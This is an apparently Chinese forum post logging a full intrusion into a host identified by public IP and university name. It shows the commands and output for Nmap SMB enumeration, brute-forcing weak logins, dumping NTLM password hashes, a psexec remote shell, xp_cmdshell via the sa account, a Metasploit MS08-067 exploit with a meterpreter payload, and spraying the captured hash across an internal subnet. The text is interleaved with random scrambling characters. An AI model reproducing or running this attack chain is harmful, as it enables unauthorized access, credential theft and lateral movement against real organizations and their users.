广西师范网站http://202.103.242.241/$ e( H& {7 t4 G) c
' Y3 N! ~# \- e& `4 o7 ~root@bt:~# nmap -sS -sV 202.103.242.241" n8 o; Q: }* l& R% Z$ s, j# k8 l
4 O3 c y" L9 CStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
/ N& ?" a, F' M% R+ Z) K
/ ?; Q' |: G' Y: N6 n: w" yNmap scan report for bogon (202.103.242.241)! h3 W; A7 m" ~; k, d7 K5 V& D
" T: J2 J, [% P6 n* m% \
Host is up (0.00048s latency).
: o: F' e2 Y+ ], j/ v' G
4 `5 f! w$ @9 k9 |; fNot shown: 993 closed ports
. i8 W/ ]* L" V$ h5 M) Z, z$ h$ J& w* r5 C
PORT STATE SERVICE VERSION
* A; R! j! A* T6 w3 L
) E; `; j/ ]3 ~1 c8 {135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
3 m Q5 t, Z; c$ W' i ]
9 q8 g' T1 h) G/ X% A139/tcp open netbios-ssn
( Y1 I9 Q( {* ]/ B. H
" j& C1 l9 j: B# N G: H" F4 s445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds( r0 l( n' A3 x8 _& E! a! L/ K
3 U7 ~# R, X, q9 m) m
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
. i0 y8 W8 v! K1 z5 O
6 {; j" p% H" W( l' J1026/tcp open msrpc Microsoft Windows RPC
" V$ |1 ~/ w7 y/ r D. J' H( l4 \& l0 D3 E% z" r
3372/tcp open msdtc?
! R" x# f- `+ X
4 i, p7 |, l- ^) Y1 O2 J) J. r7 I0 E3389/tcp open ms-term-serv?
0 f! ^, j# u5 E
& Q% S, Y9 K2 N B2 Y9 F1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
- ]6 t( `, T; J7 D/ B7 ASF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
1 _" D+ x9 i4 n5 K' p, `# |) I2 h5 N3 c6 U' ~
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions- s" {' c( I7 Y* ]
) E7 ~: b p7 o" N6 C
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)7 }. J% }% ~; B Q: z. U
; k% y& d- z' c0 MSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO7 l5 c0 J9 k" A
0 j4 L/ @& K# X& L3 s2 z
SF:ptions,6,”hO\n\x000Z”);
) X$ N6 O/ `3 f5 v* d3 t3 U, t% f; l% ^7 x
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)6 U; @* c* T: ?) p# b% J8 b% A
4 v7 o! z0 o' k/ D1 e
Service Info: OS: Windows
3 w4 A2 ?/ e6 h, T: n% m; y) v. \
& w* v' `* x* c# \+ T( @Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .2 X' ~. T* J) q& `3 o/ q3 O
; v% R* k% o* dNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
/ _3 Y+ ], `$ O: W- _& `. w3 y* `# Y$ R3 K
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
# G5 z& O2 u- j e {& v0 j k a: f1 o- E" r
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
5 B. D+ w8 ~9 Q# E9 ]+ {/ f( q# q" f; w8 Q: w& B& E ]
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse& Y0 [0 _. X. c0 u$ V
% J1 K/ m+ @5 } b; D-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
8 t$ Y( K5 s f
6 ~0 d S9 Q8 s7 \3 E9 o- C-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
+ ]2 N/ S- D; j& h* C- ?; V' p1 w; ?9 b
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse* J; l! i2 p: }+ f3 t( g, q) F
0 m! [5 f4 U8 E$ b1 W% k5 w
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
, o9 T: j- R0 P4 H8 f. C8 y/ w+ r. _
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
L2 q" u' E$ @9 k& i1 o# x7 v. k: r/ {
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse5 Z1 U' Y+ k) c' p5 Z, j. L
6 f1 h! s, B D( D( I-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse8 F% q0 m& `: Q' |
, v" j- n4 |1 y( v! U* b
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
, r9 @. @! \) ]$ l% o" u" [/ K' a: b
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse7 g% T0 o& C6 Y
9 S W! i8 D% P& P5 a# k
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse5 V+ y. H, P( D9 `; m3 y: l+ r* e
. @* V3 Q0 r7 |/ ]4 E3 m+ [" W-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
. ]% E% @- R- f7 x( K7 c/ j) g/ _
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
. L! ~2 P5 x! z, `/ @
1 ^1 ? D v; [/ ]9 @-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
& x) }4 c, n% K% P! @5 B; A
d, p' d. D4 {root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
B8 ^. f; ^8 o8 E5 I% S5 c( r! e. b8 t+ ~7 [
//此乃使用脚本扫描远程机器所存在的账户名
# X" B% `+ b, \$ s; o7 S1 l" o
, i b4 m2 d2 {6 OStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST. A1 U, B. ^8 r# \( \- |6 Q
3 Z- H. l. c+ B3 C; g5 w" B" BNmap scan report for bogon (202.103.242.241)
2 L5 S$ ]7 M$ R$ y/ b B' W, c K# J1 a# p# w1 A
Host is up (0.00038s latency).
5 u. Q/ g1 E3 o \' ~/ y$ n# `% K8 ?) x
Not shown: 993 closed ports5 m( F% s8 o. b
# n6 |& E, N/ j1 x/ j% N
PORT STATE SERVICE9 T# i0 C& U5 r/ @
; ?& l/ m, W5 k' |6 e" {' T t
135/tcp open msrpc
# r- h7 U* T3 S. t1 K0 c! w: j, d! E6 ^/ A% L; p
139/tcp open netbios-ssn
3 c4 t) y$ [6 E9 g, H' q2 K' Z. O1 \. k3 B7 H
445/tcp open microsoft-ds* ]1 K/ \8 e X4 ^7 I, G
6 a9 B+ n3 _+ [4 ^( S1025/tcp open NFS-or-IIS
5 c. E8 z; B. F @! L. w
. N( H% G6 k+ Y8 b" v( {* A1026/tcp open LSA-or-nterm2 m+ `- B6 m2 A' C8 \! h+ @" O0 I
/ b, x* I4 D! [; L! v
3372/tcp open msdtc- P% g3 F j- n) T5 z
# q& g+ o2 c' z7 F3389/tcp open ms-term-serv: q) O5 E# R' j# \* c7 P
$ X+ x" [( r) ~* o3 b" B: @
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)* _9 o: e( z! b$ E
: f% _5 d1 t, l2 s
Host script results:
' t% k/ e1 i: X% e/ L
6 C3 s6 Z5 U. d2 A) p1 I) s| smb-enum-users:
- a+ x4 [, p3 D1 h( Z
/ a+ i& ?# ~% B9 B: O- R|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
# R: [& `& \: j X5 t
( Z3 g7 s2 i0 _; o! G# [Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
2 ~# l3 j9 i7 r5 v- Y
6 k' l& J- m% [root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 + u0 F( L3 M0 U* ~7 s- n. v+ b
% U9 |3 t2 F6 ~8 q! F//查看共享; H; A& t4 F) V' q, z4 N
' Q2 T/ @# Q) n) P9 k, r
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
- e$ t0 ]3 W; Q) U* W% y
4 d1 g5 A, b2 INmap scan report for bogon (202.103.242.241)
, }$ Z9 i# w# W# y y S( T$ }) B( _, I3 m
Host is up (0.00035s latency).) f( E1 S9 b z, n7 q
/ T* g6 Z1 }+ m Q; fNot shown: 993 closed ports
( l: ^9 g c$ a/ J7 O2 W3 B& P/ v& Q" a
PORT STATE SERVICE
8 @8 _7 j' I) @6 W6 q* F. J: y4 v' R, o
135/tcp open msrpc; v( S7 t4 _/ z% \& ]
. L, V6 F# Y, U139/tcp open netbios-ssn9 f; J/ ^* a+ V* \% @
: n0 I- v% ~+ A7 E1 }6 q445/tcp open microsoft-ds
& ]0 G. k% v7 M8 Y5 h* F8 S/ l9 F" n$ [
1025/tcp open NFS-or-IIS
- q$ x4 G' @5 p$ G. X/ E% ? Y; N
2 N( V) t* ~* N; B L9 V6 e# D1026/tcp open LSA-or-nterm% ~! c4 c; d( {" n
9 x+ L0 T( n, I7 e& d
3372/tcp open msdtc% L n+ ]3 N9 _: r
( L# w$ ~4 q3 P, R" |# _0 ]
3389/tcp open ms-term-serv
8 e, m1 Q1 ~5 \' T# h7 E
. ]" L3 f5 J( v2 ?/ uMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' _6 }6 _* R! n+ d6 Y% U, h
: y* S9 E: h ~# J5 X2 H% P) pHost script results:
M7 E/ g; f3 W1 _- r" v& p
5 @7 [8 i% R+ ]* p; N| smb-enum-shares:/ t3 g+ A0 B( Q/ [, f3 s
4 { g4 }" z: _9 d v N8 \* }+ z9 N( F
| ADMIN$6 j, A Z! n$ ?% _. D. Y0 o
/ H- Z5 I s/ d% n2 H8 ?; ?
| Anonymous access: <none>+ X% |4 r& q6 [# E
- ~' R( P: {' A& Q) S
| C$, Q; O6 F( A1 d3 a
7 ^2 }" p8 v% k8 Y5 D8 d; c7 O| Anonymous access: <none>
9 J+ _ Q5 X: X- \2 Z) {6 g# P% o
. b# P/ a$ B6 f) v4 ]# n) F4 || IPC$9 S) E" M' L) P. V4 P* Q! R
) u& M/ A" O5 i# U+ {5 T
|_ Anonymous access: READ) Q6 K* U3 I$ \. O3 N* J) \. y
5 Y& `3 [0 B" U0 X
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
+ _4 i; T; @( k' E% O
3 f5 a1 K# T) o% o# u3 E3 J; nroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 / Y! B6 n& {: M; c" S% |
7 e/ u( f+ t7 C
//获取用户密码
C- C. M& e5 I& @& l) m8 p: v- c) c' J& J9 L4 P
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST. g) o3 J* T5 N. E) H5 [ w
* L T1 f9 n m8 v; hNmap scan report for bogon (202.103.242.2418): @8 c& z2 G3 `" n( ]& g
( j) ?3 t- G& q5 D/ x( v s
Host is up (0.00041s latency).3 f0 U o; ]1 M4 s
, [, F" g9 D, W! y
Not shown: 993 closed ports
0 \9 ~2 i0 |9 d
# M) O% N2 U7 V6 Q# k2 EPORT STATE SERVICE
+ c3 \5 j" l- |' K2 ?6 S: t I' n, v, P7 V% R/ Z7 ?
135/tcp open msrpc
7 t& j! P" s* v: q; K C- b- d
139/tcp open netbios-ssn% a1 T3 @* j1 @7 H# M6 C' m! o
1 [3 H7 e' @0 Z8 S* S+ K5 u+ L3 `445/tcp open microsoft-ds; M$ ]& m# q0 L3 i/ f
2 l. L, {: g3 O) ?+ u2 ~1025/tcp open NFS-or-IIS) h3 i3 J/ }" A) b, G1 B% `6 s
7 J' L6 U& M. H8 ~) r
1026/tcp open LSA-or-nterm2 K& |1 n" l5 r) Q% V' I2 G
' X* P7 f! z$ I( S5 x D3372/tcp open msdtc
9 |; h: p% P" l3 f' U7 Y; p7 I8 }/ O' ?( x7 V/ x3 w
3389/tcp open ms-term-serv1 i4 O# @7 j0 U j2 w# X$ G
" V6 G! C" N4 n; dMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)% N6 T+ Q/ W1 H0 p5 ^; H$ X
$ g. S9 H j+ ]$ b' G, iHost script results:
* x. \2 u. T) u" l1 T# B! Y2 {
3 O5 p: `1 a+ E3 i6 f| smb-brute:$ n9 n( D: ]( w& y% T- k
, \# h" ?4 d" f( N" A
administrator:<blank> => Login was successful
$ n; _8 r0 N3 D/ |$ L9 c: a; z. M9 v0 p1 P/ ~9 m0 F
|_ test:123456 => Login was successful" W* A' `: Q( G& r$ j; F- L
5 `+ x/ B0 U$ H% c5 y) h y+ {
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds) V% v4 L% {: S. d& s: M/ J
4 A0 O3 D5 \$ B$ ^, B s4 Z/ Sroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash! C+ a( {* {, S1 z: j( z1 y
* F5 |' }* e x: C8 R! H1 ]/ nroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
1 H( c* y' @" R, {5 G* m! k. ?2 B" y1 ?- H6 ^
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse0 H5 X! ~' l9 x0 i
* ]9 l; Q6 m* M# g# broot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
" s4 _ f0 u3 P( L& G q. Y/ H3 C0 j- ?8 b
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
N x: ]" }/ X6 `: o4 ^
* n8 J0 k! T9 r- i* ~/ x% cNmap scan report for bogon (202.103.242.241)
# E2 S2 Z" ]9 f% c4 n S, B4 s0 I0 H+ Y& t
Host is up (0.0012s latency).6 _7 g6 D+ ?' V1 M: n
a/ D' x! x' @3 b1 P3 F
PORT STATE SERVICE
# e- w R( O& }5 ? O! ^9 J
+ J! H& D; Y$ B3 p# |) p135/tcp open msrpc3 H( I- H) C' _
3 s% A5 e" h8 B: x5 {9 y139/tcp open netbios-ssn; ?3 U# Y0 q C0 m; |
6 O& i8 B1 p y8 K' E) Q445/tcp open microsoft-ds
2 T1 k. n3 ^: R) P) a
9 j1 O. ]0 Z6 b: h3 z. s0 b/ k. EMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' l D+ V9 R& N! l, a
^/ w6 f& D F, s6 K0 z& r
Host script results:6 V% X) ~+ o5 I9 z2 H/ o0 y
6 r" @3 D& T9 X# i& P1 x! x- M4 G
| smb-pwdump:
" X7 ]2 ^4 g' X
/ q1 o' ]+ T, Q* }( D2 c" A| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************4 K0 \9 D* y" }) ~& _
; e( S: F0 a& |7 g# u' t2 I, I| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
3 I, f# U* J' T. b. E+ [+ L- U+ S, [$ e8 `3 P j
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D48 {- A& u7 c/ R1 w( g
4 A( B5 ~ P9 d. N) c
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D24 I2 `* x1 R/ @
0 h; a) I( o5 h1 n$ X3 h
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds9 L, F" w. C( H. B( y! x2 B: a
) W5 R2 t% X% F2 B4 I- C3 WC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
! w, t& e' @. e& D" f( Y! O
" a4 a5 Z, t- [5 h5 Q-p 123456 -e cmd.exe: b" B0 n7 D$ Q& y1 d* d* u# e' t# A
: p: `; v; @2 f. yPsExec v1.55 – Execute processes remotely
# K' C. L+ W7 f' f9 Y3 F5 V; w4 h% e6 j# Z- D6 a3 G+ ~
Copyright (C) 2001-2004 Mark Russinovich4 w k: r, R" u1 R3 u1 Z
: b, L5 E$ ?8 K; }# @7 [3 [
Sysinternals – www.sysinternals.com7 l, r8 S/ P; y7 y
4 ~/ T/ c d& A1 o, o" K$ G7 k
Microsoft Windows 2000 [Version 5.00.2195]- o g5 L" E+ W; R/ \( e
. x# u, o' L2 U0 l. Z(C) 版权所有 1985-2000 Microsoft Corp.7 @, O1 V) X/ H) o4 f2 w& q
- A' H- D x6 |3 B* R6 bC:\WINNT\system32>ipconfig
& O( N( \* w9 [. r1 T! v; s4 o" ^! a/ E. O, h
Windows 2000 IP Configuration
/ x2 R/ l f1 }) ]; I6 H) f. j% y1 k) A3 g( Q% k' s$ j! q# |, v/ v" S
Ethernet adapter 本地连接:
; d a/ }5 z/ I4 T$ |
5 `1 p& [! ?' z- I, l: \( HConnection-specific DNS Suffix . :. @ y4 U! o- J2 S% `/ u
, I* z' u" o8 s' l7 z% Y# L% Q
IP Address. . . . . . . . . . . . : 202.103.242.241
5 ]! ~, N a; V) l! w C, @& e/ ^- K5 {: E8 A
Subnet Mask . . . . . . . . . . . : 255.255.255.0
: p: v' ?- C/ r4 e+ W+ j5 ]
- ~6 \+ E( Y+ ^Default Gateway . . . . . . . . . : 202.103.1.1
. |! ]+ U5 k8 r- [ }" t! N/ d: p# `! |1 @: M6 F" z
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
' F/ n# f) r2 K6 i3 {# [/ Y% D
% W2 _5 w# k" l6 p' `root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞& i4 S0 M5 _' P$ a6 f
* o, M; C7 a h0 G
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST, O, K: X4 `/ o( Z
9 m+ s5 ?, G+ T5 S9 @% DNmap scan report for bogon (202.103.242.241)
( Y8 {! m* E( s* |/ A# V! k4 D
; l; [8 _: G |7 S9 T% ?+ _+ `6 q8 ?Host is up (0.00046s latency).0 F' N& J) e$ a. @$ ^* G
4 s& ^' t t% @
Not shown: 993 closed ports
9 g6 J4 u6 k/ ]* U* j( F7 l" F% j4 M; ]) o6 k
PORT STATE SERVICE3 S- i3 x" e! ~) p' {) `
: Q; `: f! U# i# C1 [" A4 ~% c135/tcp open msrpc
0 r* [9 \ } d1 v; k1 f1 F9 R0 f& k( d, z! l2 U
139/tcp open netbios-ssn8 I! h9 m% L0 g
- G) ]) c, D+ y$ \445/tcp open microsoft-ds D. M8 v4 b/ K$ h5 B
6 c- O3 v: I6 a+ |* Z h8 z2 |
1025/tcp open NFS-or-IIS3 m1 n$ Y& L9 M
& @& ] O4 W) A: Z7 {9 ?8 I- I+ l7 K" A
1026/tcp open LSA-or-nterm
& T3 i& ~- X/ s0 N) c4 {9 U+ O4 m5 P! e. G# P+ W$ H
3372/tcp open msdtc
7 F! B3 x! S: b+ A+ a' q& Y6 N6 H: E! j- I: u B
3389/tcp open ms-term-serv
7 ], Z3 e# f5 E" U5 o( w& z% q% s; W' [; y r
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)! C' Y0 l* A( {* ]
' O' A8 @4 y6 U6 q6 t: \! x4 o7 h
Host script results:5 u: X- K* g9 ~$ @1 \6 x3 ^
% d9 \" u% m9 |" S& I
| smb-check-vulns:
& C. R) k o% R J7 D% |- z5 x) S( c5 [6 K/ O! @
|_ MS08-067: VULNERABLE i. ^" z6 g6 t/ y9 D& p
- ?! ~" n/ q. _) C# U' g6 j
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
9 Y/ b2 `) G* G$ @8 L5 ]( g" }
4 L; w, [7 j2 U! j: [7 q6 Wroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出3 j; F% t( d/ T- ^% D4 D
& m k: n' i7 q4 tmsf > search ms08
5 n4 g7 X$ W1 N( V4 m- O1 p9 h" Q1 A
* L. y1 O# Q( t0 D2 R. N5 ]4 Xmsf > use exploit/windows/smb/ms08_067_netapi9 ^8 q$ |: A" j' V# Z
0 z. H# x) o# u3 ^ Z% F' {
msf exploit(ms08_067_netapi) > show options
2 f0 x/ a z; ^5 `2 A7 I. O# f( U' P; G: B
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
! v9 K; T; T0 f2 ?8 }: ]
: B8 d6 {0 {. D# g2 Smsf exploit(ms08_067_netapi) > show payloads7 w& S2 V* @6 \2 F' {+ a& x! L3 E+ G
6 v' O4 K6 ~" H5 p) M/ m5 r- G) ^" e
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
, d9 [! z% E( p4 z+ k: J- u' `; Y/ G0 F7 @6 ^+ F0 u& F' q5 ~
msf exploit(ms08_067_netapi) > exploit+ }+ V3 N1 Q% _. w2 [
0 U3 \) N0 R& [* ^
meterpreter >
7 p+ t7 o8 I& q7 s+ L" T# E- i4 N. F. u$ `4 d
Background session 2? [y/N] (ctrl+z)* f" q$ _ i$ [; J
. |" {; ^8 n/ g- S9 d
msf exploit(ms08_067_netapi) > sessions -l
3 T& [1 \+ t% {9 U3 v" [ Z4 l' z( @% a; a% X) K: D
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt+ u1 m& z' H9 |. t' w2 f0 Z
7 ]: x3 }) m, o4 p6 H: R
test
1 `. g5 }' e; K" {% `* }/ Q3 [# K9 n% e+ j! w
administrator
$ y& r3 q3 f( l1 d) a! i# v a8 J
4 w+ \% [5 D+ U8 Q9 q# z2 eroot@bt:/usr/local/share/nmap/scripts# vim password.txt
3 _ O+ N3 ^, R/ V# [ T/ ~8 n4 u. Z0 G$ W8 t
44EFCE164AB921CAAAD3B435B51404EE0 k8 N2 ?/ N8 d6 S+ X3 b
8 I' y& X* F0 U( r6 Q
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
. d. |) A# V6 \ U2 z, Q6 h8 b. _& f% q! k# K
//利用用户名跟获取的hash尝试对整段内网进行登录
( v1 Y2 g" a0 q' f
5 O7 D& Y& M8 Z2 P D) v5 RNmap scan report for 192.168.1.105* X0 E) q5 c) {# W
% c4 I _ Q4 \8 d" e; ]Host is up (0.00088s latency)." W5 v- p7 {, T( S3 J
/ `2 `, W- @- T: _" RNot shown: 993 closed ports6 [* U2 B1 X$ X* q3 C+ U
$ t7 ~0 H T' e: |
PORT STATE SERVICE$ |+ [; K b+ S! C0 ^- @
7 {) G7 w. W. g/ [5 ^, [" O
135/tcp open msrpc- P0 p% B7 X- E& w
9 g. V- _: f( I; H/ z3 l139/tcp open netbios-ssn
; p( a7 f! Z# T! j, ?- j6 I1 `8 d. Q8 X3 ]1 E$ v% S3 U" ?! |" x
445/tcp open microsoft-ds+ m, q) A( P8 z" W- X
2 e V' a" s+ C7 p1025/tcp open NFS-or-IIS/ U* z4 q5 g1 j2 H5 n9 @4 Y- L- n" w" a
' {+ K& Q& @+ d8 o, L1026/tcp open LSA-or-nterm
/ ]1 \* ?! v3 u
2 r" K( b2 g K! e% l( P3372/tcp open msdtc8 ]" W' B7 ?$ P+ I
- `" x: s& @) O" r9 G3389/tcp open ms-term-serv
- r4 w# H# Y; \ B0 H: i
8 W$ u. [5 J0 wMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 l( X( R1 m" @8 z
6 ]) L; b' T: _
Host script results:
; c; C4 P) L7 l1 W" M" j
1 X4 }3 q+ H: W- q% r" E" [| smb-brute:
' o" w3 g8 L* i0 V* @
) h* @8 m0 _2 J0 m+ L& }# G0 q) Y6 S|_ administrator:<blank> => Login was successful
' r$ H: c, M5 _2 i3 X* V" g* N" {; H f' K" X
攻击成功,一个简单的msf+nmap攻击~~·
7 F/ Y% M* l! p# E, h, A |4 @
5 e* O2 @( ?/ `, F! b9 w" M |
发表于 2012-12-4 12:46:42
收藏
支持
反对